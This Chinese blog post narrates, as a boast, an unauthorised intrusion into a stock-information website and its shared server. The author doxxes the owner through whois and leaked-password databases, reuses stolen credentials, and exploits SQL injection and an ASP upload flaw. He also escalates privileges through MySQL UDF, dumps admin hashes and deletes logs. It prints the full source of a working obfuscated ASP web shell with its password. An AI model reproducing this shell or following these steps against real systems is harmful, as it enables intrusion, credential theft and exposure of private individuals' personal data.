关注成都生活
我们一直在努力

渗透股票网

0x001

不是为了玩才去渗透的。而是在渗透过程中享受着那各种失败 各种淫荡的思路。各种

成功后的喜悦。

 

经过了某人的同意才发出来的。

 

前段时间吧。貌似股票很火,所以我也有了检测的思念。拿拿东西/嘿嘿。

百度搜索之 股票大单网

出现许许多多的网站

选择第二个吧。因为2啊。多好哇,

渗透股票网

渗透股票网

先ping了一下 吧

额。。貌似有防火墙之类的

管他呢 。先确定下IP /

渗透股票网

渗透股票网

查下whois

发现真名 huang×××

邮箱:robo××@163.com

于是吧 邮箱拿去谷歌搜索一番

我操 发现10几站都是他注册过的。,果然是有钱淫啊

 

于是吧邮箱 放到 密码泄漏查询网站 查了下,。没有注册过泄漏门里面的站

但是放到第二个密码泄漏查询的时候 居然出了密码。怎么回事。?

再把邮箱放到第一个泄漏网站看了下。。没有啊??怎么回事

想了想 先吧@163.com去掉。试试

果然。。2个泄密们的网站他都注册了

渗透股票网

渗透股票网

收集一下密码。

现在登录天涯看看,

但是出现说是要 验证神码的 。要发一封信息到163邮箱去去密码。我操了

那现在去登录csdn的看看。也失败了,

不管了吧。只能登录163了。但是又失败了,

我这个人的思想跟别人不一样

我喜欢利用它所搜到的信息

好吧 吧他密码 组合下。。

姓名 密码。邮箱 组合一下

经过1小时的奋战。哈哈 失败了。

用它的2个密码到谷歌。百度搜一搜 。看看有什么敏感的

但是天怒人怨 。木发现神码。

 

好吧 没办法 扫ta端口去

 

 

如果有时间的话。我还可以去社工 社工。但是由于中国的时差关系。站长应该在媳妇的被窝里面xxoo吧

80 135 3306 就这么几个

先用135溢出试试。看看rp怎么样。

果真其然 rp今天不是那么好

 

开始旁注吧。

我喜欢用bing 查询

ip:2××.××.47.1××

 

哇 。网站居然有 理财者.com 打天下股票网

各种理财 各种股票啊。

ip:2××.××.47.1×× admin

没有找到相关信息

ip:2××.××.47.1×× 注册

恩。这次有了

经过半小时之后 里面的困难就不再说了,

反正吧 没什么可利用消息

ip:2××.××.47.1×× 上传  木有

ip:2××.××.47.1×× powered  也木有。

 

都是htm 和dz论坛

好吧 。木方法。只能从我不喜欢的C段开始了

 

2××.××.47.2××从这个ip段开始把。因为旁注挺多的,想对渗透起来也相当容易

在某个站 输入and 1=1 弹出不允许 and select等字符,

好吧 直接上cookies中转神器。

于是 爆出帐号密码。

扫到后台登陆之 木有数据库备份。

神马也木有。

但是在PKER扫描器当中 发现upload.asp

于是打开之。查看了下 源代码,

发现可以加1.asp;

但是目录没有执行的权利

于是换目录之。菜刀一连接。但是出了个问题。貌似不能连接

于是各种免杀小马。各种畸形马

都不行。。难道有杀毒的么

额。那就上传个404的php小马看一看,照样失败,

木办法。。。

想了想 我记得有个小马很不错 于是试了下

果然成功了。依稀记得 这个小马是f4ck某个人发出来的。但是不记得是谁了

一下是小马: <%

i=(Chr(-12590))

love=(Chr(-20306))

you=(Chr(-15133))

OK=i&love&you

CNM=Request(OK)

eVal CNM ‘pass:我爱你

%>

www.xxx.com/admin/1.asp;********.jpg

菜刀连接之 密码是 我爱你

但是

渗透股票网

渗透股票网

好吧 上大马看了下。Ws删除

支持一个免杀的aspx 于是上传aspx

看了下端口

3389 ,21,3306 ,serv端口也开着

居然大部分的盘可以浏览。哈哈 试试默认的serv提权。可惜失败了。应该是默认密码被改了之类的

10分钟后。找到mysql的帐号  收费破解之。

然后就是udf提权了。手里没免杀的。于是从朋友那里借到个 udf免杀的

这个就简单多了。

输入日下的域名。不能链接 于是输入ip 也不能链

难道改了端口了。

Asp大马上去查看一下 果然被改了

于是加上端口之

上去了。用pwdum7弄出管理员的帐号

然后删除我建造的帐号删除日志等 利用管理员的帐号登陆之。这叫保险多了呀

 

谷歌搜索 cain 中文 下载之,解压之。(好吧 废话多了点)

打开之。

渗透股票网

渗透股票网

但是半小时后。神马也没有。。

渗透股票网

渗透股票网

1小时后。但是发现了几个垃圾站点的注册会员、有个毛用

Arp试试?。。于是下载arp 刚下载玩。奇迹居然出现了!!

我被T了。。

几分钟后。我的马也删了。各种都被发现了。。

我草 牛了。。凌晨 了都。哪个管理员这么勤奋。。

那个被T的截图就不弄了

因为那个时候 我的QQ 没上呢。。

好吧,。。。

换之。

这么迟了 休息之。

把目标站点 丢给一个菜鸟基友。让他各种扫描去,

早上起来。上班 下班之。

回来之。打开电脑之。

继续昨天的渗透。

那个基友说 神马也没发现。。好吧

还是自己来把。

渗透股票网

渗透股票网

发现几个旁站 主站的二级域名

团购程序,测试了下漏洞。失败之,

在测试。又失败。其中的苦 只有我知道。

于是习惯了上了114best上面。因为这个上面有的网站查询不到的

旁注。这个地方都可以查到,

渗透股票网

发现一个域名注册 和建站的网站

果然 好几个旁注都差不到。

打开那个域名注册的网站

看了下log居然是dedecms的。。

我草 这个程序的漏洞可是多多的呀

输入dede。返回错误

应该是改后台了。好吧 只能扫了

输入data/ver.txt

升级时间:20111227

这是DedeCMS V5.7 & SP1

看了下扫描的 也没扫出神马

于是自己手动把。

输入他域名看看 失败了

admin加域名

邮箱

admin加邮箱

他的2个密码。说不定是后台哦。

但是可见失败了

各种组合 各种符号。

各种扫描 都没扫处个JB来,

Tdm的。

 

生气就— 输入 MLGBD。。你妹的。后台就是这个目录

渗透股票网

失败之。

好吧 再次组合昨天搞的 密码

测试5个成功之

他的名字缩写加密码

渗透股票网

上传一个asp马儿

发现不支持jsp aspx 但是支持php。

Ws组件被删

昨天也说了 只有80 135 3306 这几个端口开着

我想了想。这么多的旁注 。肯定有人上服务器管理员的把。3389肯定是开着的呢

或许被改了也说不定啊

里面可都是中型的站啊

好吧 找帐号把

Dedemcs的帐号 密码都在

data\common.inc.php

这个里面。,

发现这次的帐号密码居然为空,第一次遇见

Dedecms这样的

渗透股票网

至此完成任务。

 

但是不提权可惜了呀,,

 

上传udf.php

输入帐号 密码 dbname

dll成功导出

输入select read3389(); 查看3389 的端口 渗透股票网     渗透股票网

至此 拿下服务器

看了里面装了麦咖啡 。arp防火墙。杀毒软件

各种厉害的玩意啊 让我好生害怕。

删除日志。删shell。当然 服务器拿走了。。邮件通知管理员。

至此。没有破坏任何东西,

希望各位把。不要在去玩了

出了事 。抓的人可是我。虽然我不害怕把。

不要在看我马赛克的了。你看出了又怎么样。人家都补了。

赞(0) 打赏
未经允许不得转载:http://xinduseo.com » 渗透股票网
分享到: 更多 (0)

评论 抢沙发

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

微信扫一扫打赏